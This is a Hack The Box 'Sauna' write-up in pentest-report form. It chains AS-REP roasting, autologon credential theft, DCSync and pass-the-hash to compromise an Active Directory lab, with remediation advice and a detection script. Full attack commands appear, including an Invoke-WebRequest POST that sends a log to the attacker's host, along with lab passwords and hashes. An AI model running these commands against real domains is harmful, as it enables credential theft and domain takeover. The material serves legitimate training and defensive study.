HTB Sauna

Summary

HTB Sauna is an easy-rated box focused on AS-REP roasting. Username candidates are scraped from the public-facing web server, and a directory query against those candidates shows that one user has Kerberos pre-authentication disabled. The KDC will hand out an AS-REP for that user without any proof of knowledge of the password, and the encrypted part of that reply is cracked offline to gain initial access to the machine.

Following initial access, cached autologon credentials are found for an internal service account that holds DCSync rights over the domain; those rights are used to replicate the domain Administrator's NT hash, which is then passed directly to the host.

Service Enumeration

port      protocol        version                                   notes
53/tcp    DNS             Simple DNS Plus
80/tcp    HTTP            Microsoft IIS httpd 10.0
88/tcp    Kerberos        MS Windows Kerberos                       server time 7h ahead of the scanner
389/tcp   LDAP            MS Windows Active Directory LDAP          Domain: EGOTISTICAL-BANK.LOCAL, Host: SAUNA
445/tcp   SMB             (no banner)                               SMB signing enabled and required
593/tcp   RPC over HTTP   Microsoft Windows RPC over HTTP 1.0

The combination of DNS, Kerberos and LDAP (including the global catalog on 3268/3269) indicates that this is an Active Directory Domain Controller.

Nmap Scan results

Nmap scan report for 10.129.90.139
Host is up, received user-set (0.051s latency).
Scanned at 2023-10-04 21:39:21 UTC for 85s
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-10-05 04:39:32Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
|_clock-skew: 7h00m00s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 34111/tcp): CLEAN (Timeout)
|   Check 2 (port 40095/tcp): CLEAN (Timeout)
|   Check 3 (port 62362/udp): CLEAN (Timeout)
|   Check 4 (port 23798/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2023-10-05T04:39:36
|_  start_date: N/A

Initial scans revealed a set of exposed services that typically indicate an Active Directory Domain Controller, in addition to a basic IIS web server. The scan also reports a clock skew of 7 hours against the target; Kerberos rejects requests whose timestamp differs from the KDC's by more than five minutes by default, so any tool that later authenticates with Kerberos rather than NTLM needs the local clock adjusted to the target's time.

This web server was manually explored briefly, and a list of employees was found on /about.htm. The names were scraped and fed to username-anarchy to produce a list of likely usernames in common formats (first initial plus surname, first.last and so on), saved locally as brutelist.txt.
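As an added example (not part of the original writeup, and not username-anarchy's own code), the following Python script reproduces the username-generation step: it takes scraped "First Last" strings and emits candidates in the common AD logon-name formats, deduplicated and cut to the 20-character sAMAccountName limit. The names in SCRAPED_NAMES are constructed placeholders, not the employees listed on the site.

```python
import re
import unicodedata

# Username formats commonly seen in Active Directory, as templates over the
# cleaned first and last name: {first}/{last} are the full lowercase names,
# {f}/{l} the first and last initials.  Roughly ordered by how often they occur.
FORMATS = (
    "{f}{last}",        # fsmith style: the format in use on this box
    "{first}.{last}",
    "{first}{last}",
    "{f}.{last}",
    "{first}{l}",
    "{first}_{last}",
    "{last}{f}",
    "{last}.{first}",
    "{first}",
    "{last}",
)

# sAMAccountName (the pre-Windows 2000 logon name) is limited to 20 characters.
SAM_MAX_LEN = 20


def _clean(token: str) -> str:
    """Lowercase, strip accents and drop anything that is not a letter or digit."""
    ascii_only = unicodedata.normalize("NFKD", token).encode("ascii", "ignore").decode()
    return re.sub(r"[^a-z0-9]", "", ascii_only.lower())


def candidates(full_name: str) -> list:
    """Candidate logon names for one 'First [Middle] Last' string, in FORMATS order."""
    parts = [p for p in (_clean(t) for t in full_name.split()) if p]
    if not parts:
        return []
    if len(parts) == 1:                 # mononym: nothing to combine
        return [parts[0][:SAM_MAX_LEN]]
    first, last = parts[0], parts[-1]   # middle names and initials are ignored
    fields = {"first": first, "last": last, "f": first[0], "l": last[0]}
    out = []
    for fmt in FORMATS:
        name = fmt.format(**fields)[:SAM_MAX_LEN]
        if name not in out:
            out.append(name)
    return out


def build_wordlist(names) -> list:
    """Flatten candidates for every scraped name, keeping order and dropping
    duplicates (the same employee listed twice, or 'J. Smith' and 'Jane Smith',
    collide on several formats)."""
    seen, out = set(), []
    for name in names:
        for cand in candidates(name):
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


# Constructed sample input standing in for the names scraped from the site.
SCRAPED_NAMES = ["Jane Doe", "John Q. Public", "Ana María López", "Jane Doe"]

if __name__ == "__main__":
    # Redirect to brutelist.txt to feed the AS-REP roast step.
    print("\n".join(build_wordlist(SCRAPED_NAMES)))
```

The first format in the list is the one that matters most: on a large staff list the {f}{last} and {first}.{last} candidates alone usually cover most accounts, and every extra format multiplies the number of AS-REQs sent to the KDC, which is itself visible in the 4768 event log.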

After this, egotistical-bank.local (from the nmap output) was added to the local /etc/hosts file for 10.129.90.139 so that names resolve properly against the domain controller.

Once this was in place, crackmapexec was used to attempt an AS-REP roast against the prospective usernames. No password is supplied; the request only needs a valid username:


crackmapexec ldap 10.129.90.139 -u brutelist.txt -p '' --asreproast output.txt

This revealed that the user fsmith was configured without Kerberos pre-authentication: the KDC answered the AS-REQ for that name with an AS-REP, and the encrypted part of that reply was written out in hashcat's krb5asrep format. The $23$ in the line below is the encryption type (RC4-HMAC, etype 23), which roasting tools request by default because it is the fastest to crack.


$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:4c60d0ccd3e522437f68d2e5d283de80$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

This hash was saved to fsmith_hash.txt and cracked with hashcat, mode 18200 (Kerberos 5 AS-REP etype 23), against the rockyou wordlist:


hashcat -m 18200 fsmith_hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

This resulted in the retrieval of fsmith's password, which was Thestrokes23.

These credentials were then used to log on to the remote host with Evil-WinRM.

Vulnerability Explanation

With Kerberos pre-authentication disabled, the fsmith account is exposed to AS-REP roasting. Normally the KDC refuses to issue a TGT until the client proves knowledge of the password by sending a timestamp encrypted with the user's key. With the DONT_REQ_PREAUTH flag set, the KDC answers a bare AS-REQ for that username with an AS-REP whose encrypted part is protected by a key derived from the user's password. An attacker who knows only the username therefore obtains material that can be cracked offline, without failed-logon events or lockouts, resulting in a compromise of the user's credentials.

Vulnerability Fix

As this vulnerability arises from configuration, there may be multiple ways to remediate it depending on your organization's specific needs:

  • Enable pre-authentication on all accounts. The setting is the per-account DONT_REQ_PREAUTH flag (0x400000) in userAccountControl and is easy to set back by mistake, so audit the directory for accounts with the flag set rather than fixing fsmith alone.
  • Additionally, implement a stronger password policy: passwords should be longer than 12 characters and combine upper- and lower-case letters, digits and symbols. Candidate passwords should also be checked against known leaks on a service such as Have I Been Pwned to verify that they do not appear in a public wordlist; Thestrokes23 is in rockyou, which is why it was cracked.
  • If pre-authentication cannot be enabled on a particular account (for example a legacy application that does not support it), give that account a long random password so that offline cracking of its AS-REP is infeasible, and separate duties so that the exposed account holds as little access as possible; for instance, keep fsmith's WinRM access on an account that does require pre-auth, separate from whatever account needs the exception.

Severity

Assessed CVSS 3.1: 8.6 HIGH

AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C

Proof Of Concept Code

Access was gained due to configuration errors; no exploit or specialised payload was used.

Proof Screenshot

Proof Text

a0345376673f4596db53fa73867dc531

Privilege Escalation

Upon gaining access, winPEAS was uploaded to the remote host in order to gather information about possible privilege escalation vectors.

Additionally, domain users were enumerated, resulting in the discovery of a service account, svc_loanmgr, that holds Remote Management rights, which made it a point of interest.

Once winPEAS had produced its output, the log was exfiltrated to the attacking machine with Invoke-WebRequest -Uri http://10.10.14.116 -Method POST -InFile ./log.txt (a listener that accepts the POST must be running on 10.10.14.116). Examination of the output revealed svc_loanmgr's credentials: Moneymakestheworldgoround!

These were apparently cached autologon credentials; winPEAS reports them from the Winlogon registry key, which is readable by any local user.

Bloodhound-python was then used with this account's credentials to collect domain information and enumerate the domain:


bloodhound-python -u svc_loanmgr -p 'Moneymakestheworldgoround!' --zip -d EGOTISTICAL-BANK.LOCAL -ns 10.129.90.139 -c all

This generated a zip that was imported into BloodHound locally. Examination of the data showed that svc_loanmgr holds the GetChanges and GetChangesAll edges to the domain object, which BloodHound summarises as DCSync rights over the domain.

Once this was discovered, Impacket's secretsdump was used to replicate the domain controller's account secrets as svc_loanmgr and retrieve high-value hashes:


impacket-secretsdump -just-dc svc_loanmgr:Moneymakestheworldgoround\!@10.129.90.139 -outputfile dcsync_hashes

This revealed the domain Administrator's NT hash (the LM field holds the empty-LM placeholder aad3b435b51404eeaad3b435b51404ee, so only the NT hash is usable):


Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::

Once this was achieved, a pass-the-hash attack with the Administrator's NT hash was used to retrieve the proof file from the Administrator's desktop:


crackmapexec smb 10.129.90.139 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e -d egotistical-bank.local -x "type C:\Users\Administrator\Desktop\root.txt"

This resulted in a successful retrieval of the proof file and confirmed that the host accepts the Administrator's NT hash for SMB authentication (pass the hash).

Vulnerability Explanation

Autologon is a convenience feature in Windows that signs a chosen account in at boot without prompting. When it is configured through the registry, the account name and password are stored in clear text under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (DefaultUserName and DefaultPassword, with AutoAdminLogon set to 1). That key is readable by any local user, so any account configured this way can readily have its credentials stolen by anyone with a foothold on the host, as happened here from fsmith's low-privileged shell.

Vulnerability Fix

Please consider finding an alternative to autologon for this service account; if the feature is not necessary, disable it and remove the DefaultPassword value from the Winlogon key. If autologon genuinely is required, configure it with the Sysinternals Autologon tool, which stores the password as an LSA secret rather than in the world-readable registry value; note that this only raises the bar to local administrator, since LSA secrets can still be dumped with that privilege. In either case, rotate the svc_loanmgr password, since it has been exposed.

Severity

Assessed CVSS 3.1: 8.3 HIGH

AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L/E:H/RL:O/RC:C

Proof Of Concept Code

Issue is caused by a configuration error; no exploits or custom payloads used.

Vulnerability Explanation

DCSync is not a product vulnerability but an abuse of directory replication rights. A principal that holds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights on the domain object can ask a domain controller to replicate any account's secrets over the MS-DRSR protocol (the GetNCChanges call), exactly as another domain controller would, and receives the NT hashes of every account in the domain, including the Administrator and krbtgt accounts. Normally only domain controller computer accounts and the built-in administrative groups hold these rights; a service account holding them is equivalent to a domain administrator.
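As an added example (not from the original writeup), the following Python detection logic covers both findings from the defender's side: the AS-REP roast of fsmith shows up in the Security log as a successful event 4768 with Pre-Authentication Type 0, and the DCSync by svc_loanmgr as event 4662 listing the replication control-access rights. The event dictionaries are constructed to mirror those log fields; they are not real logs from the box. SAUNA$ (the DC's computer account, from the nmap host name) is assumed to be the only legitimate replicator.

```python
# Control access rights on the domain object that grant DCSync (MS-DRSR
# GetNCChanges).  They appear as GUIDs in the Properties field of event 4662.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {
    DS_REPLICATION_GET_CHANGES,
    DS_REPLICATION_GET_CHANGES_ALL,
    DS_REPLICATION_GET_CHANGES_FILTERED,
}

# Accounts that legitimately replicate: the DC computer accounts (assumed to be
# only SAUNA$ here) and, where deployed, the Azure AD Connect MSOL_* account.
REPLICATION_ALLOWLIST = {"SAUNA$"}


def is_asrep_roast(ev: dict) -> bool:
    """A successful 4768 (TGT request) with PreAuthType 0 means the KDC issued an
    AS-REP without any pre-authentication, i.e. DONT_REQ_PREAUTH is set on the
    target account.  Roasting tools also ask for RC4 (etype 0x17) so the result
    cracks as hashcat mode 18200.  Status must be 0x0: a 4768 failing with 0x19
    (KDC_ERR_PREAUTH_REQUIRED) is the normal first leg of every logon."""
    return (ev.get("EventID") == 4768
            and ev.get("Status") == "0x0"
            and ev.get("PreAuthType") == "0"
            and ev.get("TicketEncryptionType", "").lower() == "0x17")


def is_dcsync(ev: dict, allowlist=REPLICATION_ALLOWLIST) -> bool:
    """4662 (operation on an AD object) whose Properties list a replication right,
    performed by something other than a known replicating account.  4662 is only
    written when 'Audit Directory Service Access' is enabled and the domain
    object carries a SACL for these rights."""
    if ev.get("EventID") != 4662:
        return False
    props = ev.get("Properties", "").lower()
    if not any(guid in props for guid in REPLICATION_RIGHTS):
        return False
    return ev.get("SubjectUserName", "").upper() not in allowlist


def triage(events) -> list:
    """Return (alert, account) tuples for the events that match either rule."""
    alerts = []
    for ev in events:
        if is_asrep_roast(ev):
            alerts.append(("ASREP_ROAST_CANDIDATE", ev["TargetUserName"]))
        elif is_dcsync(ev):
            alerts.append(("DCSYNC", ev["SubjectUserName"]))
    return alerts


# Constructed sample events modelled on the Security log fields; not real logs
# from the box.  10.10.14.116 is the attacking host used elsewhere in this writeup.
SAMPLE_EVENTS = [
    # AS-REP roast of fsmith: no pre-auth, RC4 requested, success.
    {"EventID": 4768, "TargetUserName": "fsmith", "Status": "0x0",
     "PreAuthType": "0", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.10.14.116"},
    # Ordinary logon: encrypted-timestamp pre-auth (2), AES256 ticket (0x12).
    {"EventID": 4768, "TargetUserName": "svc_loanmgr", "Status": "0x0",
     "PreAuthType": "2", "TicketEncryptionType": "0x12",
     "IpAddress": "::ffff:10.129.90.139"},
    # First leg of a normal logon: the KDC demands pre-auth.  Not roastable.
    {"EventID": 4768, "TargetUserName": "Administrator", "Status": "0x19",
     "PreAuthType": "0", "TicketEncryptionType": "0xffffffff",
     "IpAddress": "::ffff:10.129.90.139"},
    # DCSync by svc_loanmgr: both replication rights exercised on the domain object.
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Legitimate replication by the DC's own computer account.
    {"EventID": 4662, "SubjectUserName": "SAUNA$",
     "Properties": "Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The AS-REP rule is only a candidate: a service that genuinely runs without pre-auth will fire on every logon, so the alert should be baselined per account and correlated with the source address and the burst of 4768s for non-existent users that a scraped wordlist produces. The DCSync rule is much higher fidelity, provided the allowlist is kept to real replicators.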

Vulnerability Fix

Please assess the necessity of DCSync rights on the svc_loanmgr account. If they are not needed, revoke the replication rights from the domain object's ACL and treat the account as compromised, since its password was also exposed through autologon. Going forward, periodically audit the ACL of the domain naming context for principals holding either replication right (BloodHound's GetChangesAll edge makes this quick), and alert on event 4662 carrying those rights whenever the subject is not a domain controller account.

Severity

Assessed CVSS 3.1: 8.0 HIGH

AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C

Proof Of Concept Code

Issue is caused by a configuration error; no exploits or custom payloads used.

Vulnerability Explanation

NT hashes can be passed directly in an AD environment to authenticate over NTLM, which permits an attacker to gain access without expending resources on offline password cracking. The NT hash is an unsalted MD4 of the UTF-16LE password, so it is a password equivalent; the same hash can also be used to request Kerberos tickets (overpass-the-hash), because the RC4-HMAC Kerberos key is the NT hash itself.

Vulnerability Fix

  • Consider disabling NTLM logons in the environment and relying on Kerberos instead. Note that this alone does not defeat a stolen NT hash, because the hash can still be used to obtain Kerberos tickets while RC4-HMAC is permitted; disable the RC4 encryption type for Kerberos as well, and place privileged accounts in the Protected Users group, which blocks NTLM and RC4 for them.
  • Consider deploying an MFA solution, especially for high-value accounts such as the domain admin account, bearing in mind that MFA protects interactive logons and does not cover network logons that accept an NT hash; keep domain admin credentials off hosts other than domain controllers so that the hash is not exposed in the first place.

Severity

Assessed CVSS 3.1: 8.6 HIGH

AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C

Proof Of Concept Code

Issue is caused by a configuration error; no exploits or custom payloads used.

Proof Screenshot

Proof Text

4de55bc665d053c8001a15830ab789f9